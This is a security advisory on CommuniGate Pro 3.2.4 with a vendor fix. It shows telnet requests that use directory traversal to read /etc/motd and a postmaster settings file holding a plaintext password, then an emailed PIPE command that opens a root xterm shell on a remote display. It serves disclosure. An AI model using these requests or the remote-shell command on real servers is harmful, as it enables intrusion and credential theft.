COMMAND

    CommuniGate Pro

SYSTEMS AFFECTED

    CommuniGate Pro v3.2.4

PROBLEM

    Lluis Mora  found following.   CommuniGate Pro  is a  feature-full
    commercial mail server.   It does SMTP  message routing,  provides
    POP, IMAP and HTTP access to mail, etc.

    The CommuniGate  Pro mail  server has  a built-in  web server that
    allows users to read and send  e-mail through the web, as well  as
    allowing  the  administrator  to  remotely  manage the mail server
    settings.  By default it opens port 8100/tcp for web users  access
    to mail and port 8010/tcp for web management access.

    1. Reading any file in the mail server
    ======================================
    CommuniGate  provides  a  useful  mapping  to  access the Web User
    Guide,  which  maps  the  URL  /Guide/  to  a  directory  in   the
    CommuniGate sub  tree.   The built-in  web server  suffers of  the
    well-known "../.." web server problem.   If we request a  document
    from  the  administrative  web  server  /Guide/ mapping, using the
    "../.." technique, we get to see the file contents:

        homer:~$ telnet ilf 8010
        Escape character is '^]'.
        GET /Guide/../../../../../../../../../../../../../../../etc/motd HTTP/1.0
        
        HTTP/1.0 200 OK
        [... the /etc/motd file content is shown]
        
        Connection closed by foreign host.
        homer:~$

    As CommuniGate runs  as root and  it doesn't drop  any privileges,
    we are able to access any file in the system, e.g. /etc/shadow,...
    E.g., we can retrieve the postmaster/manager settings file,  which
    includes the plaintext password to access the management website:

        homer:~$ telnet ilf 8010
        Escape character is '^]'.
        GET
        /Guide/../../../../../../../../../../../var/CommuniGate/Accounts/postmaster.
        macnt/account.settings HTTP/1.0
        
        HTTP/1.0 200 OK
        Content-Length: 61
        Date: Mon, 03 Apr 2000 09:17:35 GMT
        Content-Type: application/octet-stream
        Server: CommuniGatePro/3.2.4
        Expires: Tue, 04 Apr 2000 09:17:35 GMT
        
        { ExternalINBOX = NO; Password = 8093; UseAppPassword = YES;}
        Connection closed by foreign host.
        homer:~$

    2. Remote execution of arbitrary commands as root
    =================================================
    This is not a vulnerability in itself but a demonstration of  what
    can be accomplished once  an attacker has obtained  the postmaster
    password.

    Looking up the features of CommuniGate, we find the PIPE feature.
    It allows people to send e-mail to a program in the mail server.
    It's disabled by default, but once we can access the mail server
    settings using the postmaster password, we can just enable it,
    make the application directory be /usr/X11R6/bin/, increase the
    max.  process execution time, and send an e-mail to

        "xterm -display 172.16.2.4:0 -e /bin/sh"@

    pipe which will open a root xterm in our desktop...

    This bug has been tested on the Linux (non-redhat & redhat) v3.2.4
    (the latest stable release) distribution found at www.stalker.com.
    It has not been tested with other platforms or previous  versions,
    though we strongly  believe the bug  is platform independent,  and
    can probably be found and reproduced in previous releases.

SOLUTION

    Current  beta  versions  (as  from  v3.3b2) don't suffer from this
    security  problem.   There  is  an  upcoming stable release (v3.3)
    that will fix this problem,  and currently the v3.3 betas  (v3.3b2
    or  newer)  are  patched   against  this  attack.   Upgrades   are
    available from the vendor website.